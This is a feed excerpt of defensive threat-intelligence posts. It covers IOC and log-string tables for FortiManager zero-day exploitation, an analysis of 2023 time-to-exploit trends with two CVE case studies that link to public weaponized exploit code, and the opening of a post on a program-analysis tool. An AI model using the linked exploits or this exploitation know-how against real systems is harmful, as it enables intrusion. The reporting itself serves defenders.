<div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">IOC</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">.tm</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Archive of config files</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">9DCFAB171580B52DEAE8703157012674</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">MD5 hash of </span><span style="font-style: italic; vertical-align: baseline;">unreg_devices.txt</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <h3><span style="vertical-align: baseline;">Additional Keywords</span></h3> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: 
#5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 
100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Keyword</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">FMG-VMTM23017412</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Malicious Fortinet Device ID</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">msg="Unregistered device localhost add succeeded"</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">String indicating exploitation in /log/locallog/elog</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">changes="Edited 
device settings (SN FMG-VMTM23017412)"</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">String indicating exploitation in /log/locallog/elog</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">changes="Added unregistered device to unregistered table."</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">String indicating exploitation in /log/locallog/elog</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0qsc137p@justdefinition.com</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Observed in subs.dat and subs.dat.tmp. This is a disposable email address created by the threat actor.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Purity Supreme</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Observed in subs.dat and subs.dat.tmp</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h2>Acknowledgements</h2> <p>We would like to thank Nick Simonian and Ronnie Salomonsen for their contributions.</p> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> </div></div> <div class="block-paragraph_advanced"><div 
style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%; margin-left: auto; margin-right: auto;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><strong>Webinar</strong></p> <p><em>Two authors of this blog post, Foti Castelan and Max Thauer, will be presenting <a href="https://www.brighttalk.com/webcast/7451/628990" rel="noopener" target="_blank">additional details and mitigation strategies</a> during a Nov. 6 webinar. Register now to learn more about this threat, and how to defend against it.</em></p> </td> </tr> </tbody> </table></div> </div> </div> </div></div></description><pubDate>Wed, 23 Oct 2024 20:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575)</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>How Low Can You Go? 
An Analysis of 2023 Time-to-Exploit Trends</title><link>https://cloud.google.com/blog/topics/threat-intelligence/time-to-exploit-trends-2023/</link><description><div class="block-paragraph_advanced"><p>Written by: Casey Charrier, Robert Weiner</p> <hr/></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/tte-2023-fig1.max-1000x1000.jpg" alt="TTE 2023 executive summary"> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Mandiant analyzed 138 vulnerabilities that were disclosed in 2023 and that we tracked as exploited in the wild. Consistent with past analyses, the majority (97) of these vulnerabilities were exploited as zero-days (vulnerabilities exploited before patches are made available, excluding end-of-life technologies). Forty-one vulnerabilities were exploited as n-days (vulnerabilities first exploited after patches are available). We have previously seen, and continue to expect, growing use of zero-days over time; in 2023 the gap widened further, with zero-day exploitation outpacing n-day exploitation more heavily than we have previously observed.</span></p> <p><span style="vertical-align: baseline;">While our data is based on reliable observations, we note that the numbers are conservative estimates, as we rely on the first reported exploitation of a vulnerability. Frequently, first exploitation dates are not publicly disclosed or are given as vague timeframes (e.g., "mid-July" or "Q2 2023"), in which case we assume the latest plausible date. It is also likely that undiscovered exploitation has occurred. 
Therefore, actual times to exploit are almost certainly shorter than this data suggests.</span></p> <h2><span style="vertical-align: baseline;">Exploitation Timelines</span></h2> <h3><span style="vertical-align: baseline;">Time-to-Exploit</span></h3> <p><span style="vertical-align: baseline;">Time-to-exploit (TTE) is our metric for the average time taken to exploit a vulnerability, measured before or after a patch is released. Historically, our analyses have seen time-to-exploit fall year over year. From 2018 to 2019, we observed an average TTE of 63 days. From 2020 to the start of 2021, that number decreased to 44 days. Then, across all of 2021 and 2022, the average observed TTE dropped further to 32 days, already half of the first TTE we tracked, in 2018. In 2023, we observed the largest drop in TTE thus far, with an average of just five days. This is less than a sixth of the previously observed TTE.</span></p> <p><span style="vertical-align: baseline;">Our average TTE excludes 15 data points (two n-days and 13 zero-days) that we identified as outliers through a standard-deviation-based statistical analysis. Without the removal of these outlier TTEs, the average grows from five to 47.</span></p> <h3><span style="vertical-align: baseline;">Zero-Day vs. N-day Exploitation</span></h3> <p><span style="vertical-align: baseline;">Prior to 2023, we had observed steady ratios of n-days to zero-days: 38:62 across 2021–2022 and 39:61 across 2020 into part of 2021. However, in 2023, this ratio shifted to 30:70, a notable departure from what we had observed previously. 
Given that </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/zero-days-exploited-2022/"><span style="text-decoration: underline; vertical-align: baseline;">zero-day exploitation has risen steadily over the years</span></a><span style="vertical-align: baseline;">, the shifting ratio appears to be driven more by the recent increase in zero-day usage and detection than by a drop in n-day usage. It is also possible that actors had a larger number of successful attempts to exploit zero-days in 2023. Future data and analyses will show whether this is the start of a noticeable shift, or whether 2023 is a one-off in this regard.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/tte-2023-fig2.max-1000x1000.jpg" alt="2023 zero-day vs. n-day exploitation"> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">N-Day Exploitation</span></h3> <p><span style="vertical-align: baseline;">Consistent with our last analysis, we found that exploitation was most likely to occur within the first month of a patch being made available for an already disclosed vulnerability. Twelve percent (5) of n-days were exploited within one day, 29% (12) were exploited within one week, and over half (56%) were exploited within one month. In our last report, 25% of the n-day vulnerabilities were exploited after the six-month mark. 
In 2023, all but two (5%) n-days were exploited within six months.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/tte-2023-fig3.gif" alt="N-day exploitation timeline"> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Disclosure to Exploit to Exploitation Timelines</span></h2> <p><span style="vertical-align: baseline;">Of the analyzed vulnerabilities, 41 (30%) were first exploited after the vulnerability's public disclosure. This section focuses on that subset. Although we have looked for associations between exploit availability and exploitation timelines, Mandiant has still not observed a correlation between the two. It is common to assume such a relationship; however, our longer-term analysis shows a distinct lack of association.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/tte-2023-fig4.max-1000x1000.jpg" alt="First exploit release prior to exploitation vs. after exploitation"> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">For vulnerabilities with exploits available prior to exploitation, we observed a median of 7 days from the date of disclosure (DoD) to the first public exploit release, and a median of 30 days from the exploit's release date to the date of first known exploitation. 
The median time from disclosure to exploitation of these vulnerabilities was 43 days.</span></p> <p><span style="vertical-align: baseline;">For vulnerabilities with exploits first made available after exploitation, we observed a median time of 15 days from disclosure to exploitation. The median time from exploitation to a publicly available exploit was four days, and the median from disclosure to exploit release was 23 days.</span></p> <p><span style="vertical-align: baseline;">These statistics are consistent with our past analyses, which likewise found no consistent effect of existing exploits on in-the-wild exploitation. We continue to find this true, while noting that other factors also affect the exploitation timeline of a given vulnerability, including, but not limited to, exploitation value and exploitation difficulty. To highlight one of these factors, we note that of the vulnerabilities disclosed in 2023 that received media coverage, 58% are not known to be exploited in the wild, and of those with at least one public proof of concept (PoC) or exploit, 72% are not known to be exploited in the wild. The following two examples show how much the effect of an exploit's release on the time to in-the-wild exploitation can vary, and illustrate other potential influences on exploitation.</span></p> <h3><span style="vertical-align: baseline;">CVE-2023-28121 Use Case</span></h3> <p><a href="https://advantage.mandiant.com/vulnerabilities/vulnerability--a25bb57d-7c99-57b8-958c-86c63065627f" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2023-28121</span></a><span style="vertical-align: baseline;"> is an improper authentication vulnerability affecting the WooCommerce Payments plugin for WordPress. 
This vulnerability was disclosed on March 23, 2023, and did not receive its first proof of concept or even technical details until three and a half months later on July 3, when a blog was posted outlining how to create an Administrator user without prior authentication. This was followed quickly by a Metasploit module being released on July 4 with the ability to scan for the vulnerability and exploit it to create a new Administrator user. No exploitation activity was seen immediately following the release of this PoC or Metasploit module. Instead, exploitation activity is first known to have begun on July 14, soon after </span><a href="https://github.com/im-hanzou/Mass-CVE-2023-28121" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">another weaponized exploit</span></a><span style="vertical-align: baseline;"> was released. This exploit was first released July 11, with an upgraded version then released on July 13. Both versions of this exploit have the capability to exploit an arbitrary number of vulnerable systems in order to create a new Administrator user. Wordfence later </span><a href="https://www.wordfence.com/blog/2023/07/massive-targeted-exploit-campaign-against-woocommerce-payments-underway/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reported</span></a><span style="vertical-align: baseline;"> that the exploitation campaign began on July 14 and activity peaked on July 16 with 1.3 million attacks observed on that day alone. 
</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/tte-2023-fig5.max-1000x1000.jpg" alt="CVE-2023-28121 timeline"> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">This vulnerability's timeline highlights a period of over three months where exploitation did not occur following disclosure; however, large-scale exploitation began 10 days after the first exploit was released and only three days after a second exploit with mass-exploitation capabilities was released. In this case, a functional, large-scale, and reliable exploit being made publicly available likely increased the motivation for a threat actor to exploit this vulnerability.</span></p> <h3><span style="vertical-align: baseline;">CVE-2023-27997 Use Case</span></h3> <p><a href="https://advantage.mandiant.com/vulnerabilities/vulnerability--ade68481-1a84-51d5-a027-318334b4ed8c" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CVE-2023-27997</span></a><span style="vertical-align: baseline;">, also known as XORtigate, is a heap-based buffer overflow in the Secure Sockets Layer (SSL) / virtual private network (VPN) component of Fortinet FortiOS. This vulnerability was disclosed on June 11, 2023, and immediately received significant media attention, being named XORtigate before Fortinet had even released its official security advisory on June 12. The disclosure was quickly followed on June 13 by two blog posts containing PoCs, and one since-deleted non-weaponized exploit on GitHub. 
By June 16, </span><a href="https://labs.watchtowr.com/xortigate-or-cve-2023-27997/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">proof-of-concept code</span></a><span style="vertical-align: baseline;">, </span><a href="https://github.com/BishopFox/CVE-2023-27997-check" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">scanners</span></a><span style="vertical-align: baseline;">, and </span><a href="https://github.com/rio128128/CVE-2023-27997-POC/blob/main/CVE-2023-27997.py" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">weaponized exploit code</span></a><span style="vertical-align: baseline;"> were all publicly available. While exploitation could be expected to swiftly follow the immediate attention and the exploits released, it was not until around three months after disclosure, on Sept. 12, that Mandiant first observed exploitation activity. Exploitation of this vulnerability is only known by Mandiant to have been performed in relatively limited and targeted campaigns. In this case, public interest and exploit availability did not appear to affect the timeline of exploitation.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/tte-2023-fig6.max-1000x1000.jpg" alt="CVE-2023-27997 timeline"> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Use Case Comparison</span></h3> <p><span style="vertical-align: baseline;">One of the most likely reasons for the difference in observed timelines is the difference in reliability and ease of exploitation between the two vulnerabilities. 
CVE-2023-28121, which was exploited soon after exploits became available, is quite simple to exploit, requiring just one specific HTTP header to be set on an otherwise normally formatted web request. This makes large-scale and automated exploitation campaigns more plausible. On the other hand, CVE-2023-27997 requires exploiting a heap-based buffer overflow against systems which typically have several standard and non-standard protections, including data execution prevention (DEP) and address space layout randomization (ASLR), as well as navigating the logic of a custom hashing and XORing mechanism. When considering the multiple complexities involved in addition to the fact that targeted systems would likely already have multiple mitigations in place, we can see how much less time-efficient and reliable exploitation of this vulnerability would be.</span></p> <p><span style="vertical-align: baseline;">The other potential factor we identified is the difference in the value provided to an attacker by exploiting the affected products. FortiOS is a security-focused product that is typically deployed, oftentimes with significant privileges, within highly sensitive environments. Therefore, exploitation of CVE-2023-27997 could provide an attacker with those same privileges, furthering the potential damage an attacker could cause. WooCommerce Payments is one of the most popular WordPress plugins, and exploitation of CVE-2023-28121 can lead to complete access of the underlying web server that the plugin is running on. However, these web servers typically exist within demilitarized zones (DMZs) or other low-privileged network segments and thus present limited value to an attacker looking to exploit the larger organization that the plugin runs within. This suggests that intended utilization is a driving consideration for an adversary. 
Directing more energy toward exploit development of the more difficult, yet "more valuable" vulnerability would be logical if it better aligns with their objectives, whereas the easier-to-exploit and "less valuable" vulnerability may present more value to more opportunistic adversaries.</span></p> <h2><span style="vertical-align: baseline;">Exploited Vulnerabilities by Vendor</span></h2> <p><span style="vertical-align: baseline;">Exploited vendors continue to grow in both number and variety. In 2023, we saw a 17% increase from our previous highest exploited vendor count in 2021. In recent years, Microsoft, Apple, and Google have been the most exploited vendors year over year. However, their prominence in the overall number of exploited vendors has continued to decrease, falling just below 40% this past year. This is about a 10% drop from the just under 50% we saw from 2021 to 2022. Additionally, this is one of the first times in a while that one of the three has barely made a top spot. Google had eight vulnerabilities exploited, while Adobe, the fourth most exploited vendor, had six vulnerabilities exploited. Further, 31 of the 53 vendors (58%) had only one vulnerability exploited. Attackers are diversifying their targets and seeing success in doing so. 
As variance in targeted products continues to grow along with exploitation frequency, defenders must meet the challenge of protecting sprawling attack surfaces.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/tte-2023-fig7.max-1000x1000.jpg" alt="Number of vendors exploited by year"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">We note that the total number of vulnerabilities affecting a vendor does not directly relate to how secure or insecure a vendor's security posture is, nor does it signify that it is "less secure" than its competitors. Ubiquity of product use and the extent of a vendor's offered products both impact the numbers we see. Given the extent of today's challenges around defending such diversified systems and networks, learning from best practices across industries will lead to some of the best approaches for seeing successful exploitation prevention.</span></p> <h2><span style="vertical-align: baseline;">Implications</span></h2> <p><span style="vertical-align: baseline;">As the amount of discovered vulnerabilities </span><a href="https://www.cvedetails.com/browse-by-date.php" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">grows over time</span></a><span style="vertical-align: baseline;">, threat actors are provided with more opportunities to take advantage of these weaknesses. 
Mandiant has found that exploits, for both zero-days and n-days, have been the number one initial infection vector in Mandiant Incident Response (IR) engagements for </span><a href="https://services.google.com/fh/files/misc/rpt-mtrends-2021-en.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">2020</span></a><span style="vertical-align: baseline;">, </span><a href="https://services.google.com/fh/files/misc/m-trends-report-2022-en.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">2021</span></a><span style="vertical-align: baseline;">, </span><a href="https://services.google.com/fh/files/misc/m_trends_2023_report.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">2022</span></a><span style="vertical-align: baseline;">, and </span><a href="https://services.google.com/fh/files/misc/m-trends-2024.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">2023</span></a><span style="vertical-align: baseline;">. This is pushing defenders to provide efficient detection and response as well as to adapt to events in real time. Further, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/putting-model-work-enabling-defenders-vulnerability-intelligence-intelligence-vulnerability-management-part-four"><span style="text-decoration: underline; vertical-align: baseline;">patching prioritization</span></a><span style="vertical-align: baseline;"> is increasingly difficult as n-days are exploited more quickly and in a greater variety of products. This increase in available technologies expands attack surfaces, reinforcing the importance of considering how a singular vulnerable technology could affect systems and networks laterally. 
Segmented architectures and access control implementations should be prioritized in order to limit the extent of impacted systems and data when exploitation does occur.</span></p> <p><span style="vertical-align: baseline;">After multiple years of tracking our observed TTEs, we can see that the numbers fall drastically with each analysis. Just five to six years ago, we observed an average TTE of 63 days. That number has now fallen to five days. While we are aware that better and more common threat detection capabilities are likely an aspect of growing exploitation numbers, our data clearly shows that attackers are able to move quickly enough to beat patching cycles. As threat actors shorten TTEs and have more success with zero-day exploitation, delaying patching and exposing insufficiently protected attack surfaces heightens the chance of successful attacks.</span></p> <p><span style="vertical-align: baseline;">Our data has continued to show that exploit release and media attention are not predictive of exploitation timelines. While in some cases these data points are correlated, the trends do not currently show that these factors should dictate prioritization or constitute an elevated response to a given vulnerability. Exploit release and the attention received by a vulnerability should be taken into account; however, they should be considered heuristic data points alongside other factors such as the difficulty of exploitation and the value exploitation may present.</span></p> <h2><span style="vertical-align: baseline;">Outlook</span></h2> <p><span style="vertical-align: baseline;">Based on our analyses, we know that zero-day exploitation remains a coveted approach for threat actors. If zero-day exploitation continues to outnumber n-day exploitation while n-day exploitation continues to occur more quickly following disclosure, we could expect the average TTE to fall further in the future. 
Additionally, because zero-day discovery is more difficult, there is room for growing numbers of exploited vulnerabilities over time as detection tools continue improving and become more widespread.</span></p> <p><span style="vertical-align: baseline;">We do not expect n-day usage to drop significantly, nor the number of targeted vendors to decrease over the coming years. We expect threat actors to continue using both n-days and zero-days as well as to expand exploitation across more vendors and products. We expect these trends to continue: quicker exploitation timelines across a larger span of targets.</span></p> <p><span style="vertical-align: baseline;">It is important to note that the increased ratio of zero-day exploitation and the generally shrinking timelines do not imply that threat actors will stop targeting n-days. We have seen, many times over, how threat actors will utilize vulnerabilities months or years after patches have been released.</span></p></div></description><pubDate>Tue, 15 Oct 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/time-to-exploit-trends-2023/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>How Low Can You Go? 
An Analysis of 2023 Time-to-Exploit Trends</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/time-to-exploit-trends-2023/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>capa Explorer Web: A Web-Based Tool for Program Capability Analysis</title><link>https://cloud.google.com/blog/topics/threat-intelligence/capa-explorer-web-program-capability-analysis/</link><description><div class="block-paragraph_advanced"><p>Written by: <span style="vertical-align: baseline;">Soufiane Fariss, Willi Ballenthin, Mike Hunhoff, Genwei Jiang, Tina Johnson, Moritz Raabe</span></p> <hr/></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;"><a href="https://cloud.google.com/blog/topics/threat-intelligence/capa-automatically-identify-malware-capabilities/">capa</a>, developed by Mandiant's FLARE team, is a reverse engineering tool that automates the identification of program capabilities. In this blog post we introduce </span><a href="https://mandiant.github.io/capa/explorer/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">capa Explorer Web</span></a><span style="vertical-align: baseline;">, a browser-based tool to display the capabilities found by capa. 
The capa Explorer Web UI provides an intuitive and interactive way to visualize the capa analysis results.</span></p> <p><span style="vertical-align: baseline;">This feature was implemented by Soufiane Fariss (</span><a href="https://github.com/s-ff" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">@s-ff</span></a><span style="vertical-align: baseline;">) as part of the </span><a href="https://summerofcode.withgoogle.com/programs/2024/projects/cR3hjbsq" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Summer of Code (GSoC) project</span></a><span style="vertical-align: baseline;"> that the Mandiant FLARE team mentored in 2024.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/capa-explorer-web-fig1.max-1000x1000.png" alt="Using capa Explorer Web to visualize the results of a dropper"> </a> <figcaption class="article-image__caption "><p data-block-key="65h86">Figure 1: Using <a href="https://mandiant.github.io/capa/explorer/">capa Explorer Web</a> to visualize the results of a <a href="https://www.virustotal.com/gui/file/2b09154b498e9959f5efbcfa768dcdc2394dc527b2785e1ce68bc8a33c6804b8">dropper</a></p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Background</span></h2> <p><a href="https://cloud.google.com/blog/topics/threat-intelligence/capa-automatically-identify-malware-capabilities/"><span style="text-decoration: underline; vertical-align: baseline;">capa analyzes programs</span></a><span style="vertical-align: baseline;"> using various backends, such as </span><a 
href="https://cloud.google.com/blog/topics/threat-intelligence/capa-2-better-stronger-faster/"><span style="text-decoration: underline; vertical-align: baseline;">IDA Pro</span></a><span style="vertical-align: baseline;">, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/capa-harnesses-ghidra"><span style="text-decoration: underline; vertical-align: baseline;">Ghidra</span></a><span style="vertical-align: baseline;">, and </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/dynamic-capa-executable-behavior-cape-sandbox/"><span style="text-decoration: underline; vertical-align: baseline;">CAPE</span></a><span style="vertical-align: baseline;">, to extract features. Then it identifies capabilities by matching these features against rules written by experts. A program matches a capability rule when its extracted features match the set of conditions declared in the rule.</span></p> <p><span style="vertical-align: baseline;">Before the release of capa Explorer Web, the </span><a href="https://github.com/mandiant/capa/tree/master/capa/ida/plugin" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">capa Explorer IDA</span></a><span style="vertical-align: baseline;"> plugin was the only way to interactively explore capa rule matches. Analysts without access to IDA Pro had no graphical interface to easily inspect capa results. 
Due to the large amount of data, this was an especially notable shortcoming for the exploration of dynamic results, a </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/dynamic-capa-executable-behavior-cape-sandbox"><span style="text-decoration: underline; vertical-align: baseline;">feature introduced in capa v7.0</span></a><span style="vertical-align: baseline;"> for detecting capabilities from sandbox traces.</span></p> <h2><span style="vertical-align: baseline;">Introducing capa Explorer Web</span></h2> <p><span style="vertical-align: baseline;">capa Explorer Web offers an intuitive and interactive visualization of capa analysis results. Users can browse rule matches and understand the reasoning behind them. Analysts can sort, search, and filter results. The interface offers different views including a table view with rule match details (see Figure 1), a function-centric view for static analysis, and a process-tree view for dynamic analysis results.</span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Getting Started</span></h3> <p><span style="vertical-align: baseline;">capa Explorer Web is <a href="https://mandiant.github.io/capa/explorer/" rel="noopener" target="_blank">accessible online at our GitHub page</a></span><span style="vertical-align: baseline;">, 